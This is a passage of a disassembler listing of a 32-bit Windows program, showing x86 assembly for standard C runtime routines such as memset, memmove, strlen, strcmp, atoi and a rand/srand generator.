loc_41728F: ; CODE XREF: sub_4171E1+A7�j
cmp eax, ebx
jnz short loc_417257
loc_417293: ; CODE XREF: sub_4171E1+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_4172A6
mov eax, [esi]
cmp [eax], bl
jnz short loc_4172A6
mov [ebp+var_4], 1
loc_4172A6: ; CODE XREF: sub_4171E1+B6�j
; sub_4171E1+BC�j
mov eax, [ebp+var_4]
loc_4172A9: ; CODE XREF: sub_4171E1+57�j
; sub_4171E1+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4171E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172AE proc near ; CODE XREF: sub_401000+64�p
; sub_4010B5+308�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_419E38
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4172EE
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4172FB
; ---------------------------------------------------------------------------
loc_4172EE: ; CODE XREF: sub_4172AE+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_419D23
pop ecx
pop ecx
loc_4172FB: ; CODE XREF: sub_4172AE+3E�j
mov eax, esi
pop esi
leave
retn
sub_4172AE endp
; =============== S U B R O U T I N E =======================================
sub_417300 proc near ; CODE XREF: sub_401000+2E�p
; sub_401D82+46�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_439550, eax
retn
sub_417300 endp
; =============== S U B R O U T I N E =======================================
sub_41730A proc near ; CODE XREF: sub_4010B5+CB�p
; sub_4010B5+13F�p ...
mov eax, ds:dword_439550
imul eax, 343FDh
add eax, 269EC3h
mov ds:dword_439550, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_41730A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417330 proc near ; CODE XREF: sub_4010B5+281�p
; sub_40144A+180�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_417383
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_417377
neg ecx
and ecx, 3
jz short loc_417359
sub edx, ecx
loc_417353: ; CODE XREF: sub_417330+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_417353
loc_417359: ; CODE XREF: sub_417330+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_417377
rep stosd
test edx, edx
jz short loc_41737D
loc_417377: ; CODE XREF: sub_417330+18�j
; sub_417330+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_417377
loc_41737D: ; CODE XREF: sub_417330+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417383: ; CODE XREF: sub_417330+A�j
mov eax, [esp+arg_0]
retn
sub_417330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417390 proc near ; CODE XREF: sub_4010B5+22D�p
; sub_4010B5+23E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_39 = byte ptr 41h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4173B0
cmp edi, eax
jb loc_417528
loc_4173B0: ; CODE XREF: sub_417390+16�j
test edi, 3
jnz short loc_4173CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
loc_4173CC: ; CODE XREF: sub_417390+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4173E4
and eax, 3
add ecx, eax
jmp dword ptr loc_4173EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4173E4: ; CODE XREF: sub_417390+46�j
jmp dword ptr loc_4174E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4173EC: ; CODE XREF: sub_417390+31�j
; sub_417390+8E�j ...
jmp off_41746C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_417400
dd offset loc_41742C
dd offset loc_417450
; ---------------------------------------------------------------------------
loc_417400: ; DATA XREF: sub_417390+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41742C: ; DATA XREF: sub_417390+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417450: ; DATA XREF: sub_417390+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41746C dd offset loc_4174CF ; DATA XREF: sub_417390:loc_4173EC�r
dd offset loc_4174BC
dd offset loc_4174B4
dd offset loc_4174AC
dd offset loc_4174A4
dd offset loc_41749C
dd offset loc_417494
dd offset loc_41748C
; ---------------------------------------------------------------------------
loc_41748C: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_417494: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41749C: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4174A4: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4174AC: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4174B4: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4174BC: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4174CF: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390:off_41746C�o
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4174D8 dd offset loc_4174E8 ; DATA XREF: sub_417390+35�r
; sub_417390+92�r ...
dd offset loc_4174F0
dd offset loc_4174FC
dd offset loc_417510
; ---------------------------------------------------------------------------
loc_4174E8: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4174F0: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4174FC: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417510: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417528: ; CODE XREF: sub_417390+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41755C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417550
std
rep movsd
cld
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417550: ; CODE XREF: sub_417390+1B1�j
; sub_417390+208�j ...
neg ecx
jmp off_417620[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41755C: ; CODE XREF: sub_417390+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_417574
and eax, 3
sub ecx, eax
jmp dword ptr loc_417574+4[eax*4]
; ---------------------------------------------------------------------------
loc_417574: ; CODE XREF: sub_417390+1D6�j
; DATA XREF: sub_417390+1DD�r
jmp off_417670[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [ebp+arg_39], dh
add [eax-2FFFBE8Bh], ch
jnz short loc_4175C8
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_417550
std
rep movsd
cld
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_417550
std
rep movsd
cld
loc_4175C8: ; CODE XREF: sub_417390+1F5�j
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_417550
std
rep movsd
cld
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417624
dd offset loc_41762C
dd offset loc_417634
dd offset loc_41763C
dd offset loc_417644
dd offset loc_41764C
dd offset loc_417654
off_417620 dd offset loc_417667 ; DATA XREF: sub_417390+1C2�r
; ---------------------------------------------------------------------------
loc_417624: ; DATA XREF: sub_417390+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41762C: ; DATA XREF: sub_417390+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_417634: ; DATA XREF: sub_417390+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41763C: ; DATA XREF: sub_417390+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_417644: ; DATA XREF: sub_417390+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41764C: ; DATA XREF: sub_417390+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_417654: ; DATA XREF: sub_417390+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417667: ; CODE XREF: sub_417390+1C2�j
; DATA XREF: sub_417390:off_417620�o
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_417670 dd offset loc_417680 ; DATA XREF: sub_417390+1B7�r
; sub_417390:loc_417574�r ...
dd offset loc_417688
dd offset loc_417698
dd offset loc_4176AC
; ---------------------------------------------------------------------------
loc_417680: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417688: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417698: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4176AC: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_417390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4176D0 proc near ; CODE XREF: sub_4010B5+FC�p
; sub_4010B5+118�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41771C
loc_4176E0: ; CODE XREF: sub_4176D0+3C�j
; sub_4176D0+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_417714
or al, al
jz short loc_417710
cmp ah, [ecx+1]
jnz short loc_417714
or ah, ah
jz short loc_417710
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_417714
or al, al
jz short loc_417710
cmp ah, [ecx+3]
jnz short loc_417714
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_4176E0
mov edi, edi
loc_417710: ; CODE XREF: sub_4176D0+18�j
; sub_4176D0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_417714: ; CODE XREF: sub_4176D0+14�j
; sub_4176D0+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41771C: ; CODE XREF: sub_4176D0+E�j
test edx, 1
jz short loc_417738
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_417714
inc ecx
or al, al
jz short loc_417710
test edx, 2
jz short loc_4176E0
loc_417738: ; CODE XREF: sub_4176D0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_417714
or al, al
jz short loc_417710
cmp ah, [ecx+1]
jnz short loc_417714
or ah, ah
jz short loc_417710
add ecx, 2
jmp short loc_4176E0
sub_4176D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417760 proc near ; CODE XREF: sub_4010B5+19E�p
; sub_401A76+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_417779
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_417779: ; CODE XREF: sub_417760+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_417760 endp
; =============== S U B R O U T I N E =======================================
sub_417794 proc near ; CODE XREF: sub_41781F+4�p
; sub_42094E+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_41779C: ; CODE XREF: sub_417794+34�j
cmp ds:dword_4397AC, 1
jle short loc_4177B4
movzx eax, byte ptr [edi]
push 8
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_4177C3
; ---------------------------------------------------------------------------
loc_4177B4: ; CODE XREF: sub_417794+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_4395A0
mov al, [ecx+eax*2]
and eax, 8
loc_4177C3: ; CODE XREF: sub_417794+1E�j
test eax, eax
jz short loc_4177CA
inc edi
jmp short loc_41779C
; ---------------------------------------------------------------------------
loc_4177CA: ; CODE XREF: sub_417794+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4177DA
cmp esi, 2Bh
jnz short loc_4177DE
loc_4177DA: ; CODE XREF: sub_417794+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4177DE: ; CODE XREF: sub_417794+44�j
xor ebx, ebx
loc_4177E0: ; CODE XREF: sub_417794+7B�j
cmp ds:dword_4397AC, 1
jle short loc_4177F5
push 4
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_417800
; ---------------------------------------------------------------------------
loc_4177F5: ; CODE XREF: sub_417794+53�j
mov eax, ds:off_4395A0
mov al, [eax+esi*2]
and eax, 4
loc_417800: ; CODE XREF: sub_417794+5F�j
test eax, eax
jz short loc_417811
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4177E0
; ---------------------------------------------------------------------------
loc_417811: ; CODE XREF: sub_417794+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_41781A
neg eax
loc_41781A: ; CODE XREF: sub_417794+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_417794 endp
; =============== S U B R O U T I N E =======================================
sub_41781F proc near ; CODE XREF: sub_4013EC+12�p
; sub_4013EC+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_417794
pop ecx
retn
sub_41781F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41782A proc near ; CODE XREF: sub_40144A+318�p
; sub_401D82+460�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_419E38
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_417869
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_417876
; ---------------------------------------------------------------------------
loc_417869: ; CODE XREF: sub_41782A+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_419D23
pop ecx
pop ecx
loc_417876: ; CODE XREF: sub_41782A+3D�j
mov eax, esi
pop esi
leave
retn
sub_41782A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417880 proc near ; CODE XREF: sub_401D82+2D8�p
; sub_401D82+2F8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4178FA
mov dh, [ecx+1]
test dh, dh
jz short loc_4178E7
loc_417898: ; CODE XREF: sub_417880+52�j
; sub_417880+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4178BA
test al, al
jz short loc_4178B4
loc_4178A9: ; CODE XREF: sub_417880+32�j
mov al, [esi]
inc esi
loc_4178AC: ; CODE XREF: sub_417880+3F�j
cmp al, dl
jz short loc_4178BA
test al, al
jnz short loc_4178A9
loc_4178B4: ; CODE XREF: sub_417880+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4178BA: ; CODE XREF: sub_417880+23�j
; sub_417880+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4178AC
lea edi, [esi-1]
loc_4178C4: ; CODE XREF: sub_417880+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_4178F3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_417898
mov al, [ecx+3]
test al, al
jz short loc_4178F3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4178C4
jmp short loc_417898
; ---------------------------------------------------------------------------
loc_4178E7: ; CODE XREF: sub_417880+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_418F56
; ---------------------------------------------------------------------------
loc_4178F3: ; CODE XREF: sub_417880+49�j
; sub_417880+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4178FA: ; CODE XREF: sub_417880+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_417880 endp
; =============== S U B R O U T I N E =======================================
sub_417900 proc near ; CODE XREF: sub_4022C6+94�p
; sub_405A58+7C�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_417915
or eax, 0FFFFFFFFh
jmp short loc_41794F
; ---------------------------------------------------------------------------
loc_417915: ; CODE XREF: sub_417900+E�j
test al, 83h
jz short loc_41794D
push esi
call sub_41A7D0
push esi
mov edi, eax
call sub_41A76A
push dword ptr [esi+10h]
call sub_41A6B7
add esp, 0Ch
test eax, eax
jge short loc_41793B
or edi, 0FFFFFFFFh
jmp short loc_41794D
; ---------------------------------------------------------------------------
loc_41793B: ; CODE XREF: sub_417900+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_41794D
push eax
call sub_417C3B
and dword ptr [esi+1Ch], 0
pop ecx
loc_41794D: ; CODE XREF: sub_417900+17�j
; sub_417900+39�j ...
mov eax, edi
loc_41794F: ; CODE XREF: sub_417900+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_417900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417956 proc near ; CODE XREF: sub_4022C6+8E�p
; sub_40EE72+2B0F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_41A8A2
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419E38
push [ebp+arg_0]
mov edi, eax
push esi
call sub_41A92F
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_417956 endp
; =============== S U B R O U T I N E =======================================
sub_417988 proc near ; CODE XREF: sub_4179A8+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41AADC
test eax, eax
jnz short loc_417992
retn
; ---------------------------------------------------------------------------
loc_417992: ; CODE XREF: sub_417988+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41A96C
add esp, 10h
retn
sub_417988 endp
; =============== S U B R O U T I N E =======================================
sub_4179A8 proc near ; CODE XREF: sub_4022C6+54�p
; sub_405A58+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_417988
add esp, 0Ch
retn
sub_4179A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4179C0 proc near ; CODE XREF: sub_405AF2+2BF�p
; sub_40A7D7+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_417A31
sub_4179C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4179D0 proc near ; CODE XREF: sub_4022C6+32�p
; sub_4022C6+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4179EC
loc_4179DD: ; CODE XREF: sub_4179D0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_417A1F
test ecx, 3
jnz short loc_4179DD
loc_4179EC: ; CODE XREF: sub_4179D0+B�j
; sub_4179D0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4179EC
mov eax, [ecx-4]
test al, al
jz short loc_417A2E
test ah, ah
jz short loc_417A29
test eax, 0FF0000h
jz short loc_417A24
test eax, 0FF000000h
jz short loc_417A1F
jmp short loc_4179EC
; ---------------------------------------------------------------------------
loc_417A1F: ; CODE XREF: sub_4179D0+12�j
; sub_4179D0+4B�j
lea edi, [ecx-1]
jmp short loc_417A31
; ---------------------------------------------------------------------------
loc_417A24: ; CODE XREF: sub_4179D0+44�j
lea edi, [ecx-2]
jmp short loc_417A31
; ---------------------------------------------------------------------------
loc_417A29: ; CODE XREF: sub_4179D0+3D�j
lea edi, [ecx-3]
jmp short loc_417A31
; ---------------------------------------------------------------------------
loc_417A2E: ; CODE XREF: sub_4179D0+39�j
lea edi, [ecx-4]
loc_417A31: ; CODE XREF: sub_4179C0+5�j
; sub_4179D0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_417A56
loc_417A3D: ; CODE XREF: sub_4179D0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_417AA8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_417A3D
jmp short loc_417A56
; ---------------------------------------------------------------------------
loc_417A51: ; CODE XREF: sub_4179D0+9E�j
; sub_4179D0+B8�j
mov [edi], edx
add edi, 4
loc_417A56: ; CODE XREF: sub_4179D0+6B�j
; sub_4179D0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_417A51
test dl, dl
jz short loc_417AA8
test dh, dh
jz short loc_417A9F
test edx, 0FF0000h
jz short loc_417A92
test edx, 0FF000000h
jz short loc_417A8A
jmp short loc_417A51
; ---------------------------------------------------------------------------
loc_417A8A: ; CODE XREF: sub_4179D0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417A92: ; CODE XREF: sub_4179D0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_4179D0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417AA8: ; CODE XREF: sub_4179D0+72�j
; sub_4179D0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_4179D0 endp
; =============== S U B R O U T I N E =======================================
sub_417AB0 proc near ; CODE XREF: sub_4023A7+1A7�p
; sub_4023A7:loc_402561�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_417AD0
loc_417ABC: ; CODE XREF: sub_417AB0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_417B03
test ecx, 3
jnz short loc_417ABC
add eax, 0
loc_417AD0: ; CODE XREF: sub_417AB0+A�j
; sub_417AB0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_417AD0
mov eax, [ecx-4]
test al, al
jz short loc_417B21
test ah, ah
jz short loc_417B17
test eax, 0FF0000h
jz short loc_417B0D
test eax, 0FF000000h
jz short loc_417B03
jmp short loc_417AD0
; ---------------------------------------------------------------------------
loc_417B03: ; CODE XREF: sub_417AB0+11�j
; sub_417AB0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B0D: ; CODE XREF: sub_417AB0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_417AB0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B21: ; CODE XREF: sub_417AB0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_417AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417B30 proc near ; CODE XREF: sub_402688+8�p
; sub_402B84+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_417B50
loc_417B3C: ; CODE XREF: sub_417B30+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_417B3C
loc_417B50: ; CODE XREF: sub_417B30+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_417B30 endp
; =============== S U B R O U T I N E =======================================
sub_417B5F proc near ; CODE XREF: sub_4029E9+7A�p
; sub_4029E9+8A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_417B73
loc_417B6B: ; CODE XREF: sub_417B5F+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_417B6B
loc_417B73: ; CODE XREF: sub_417B5F+A�j
mov edx, [esp+arg_4]
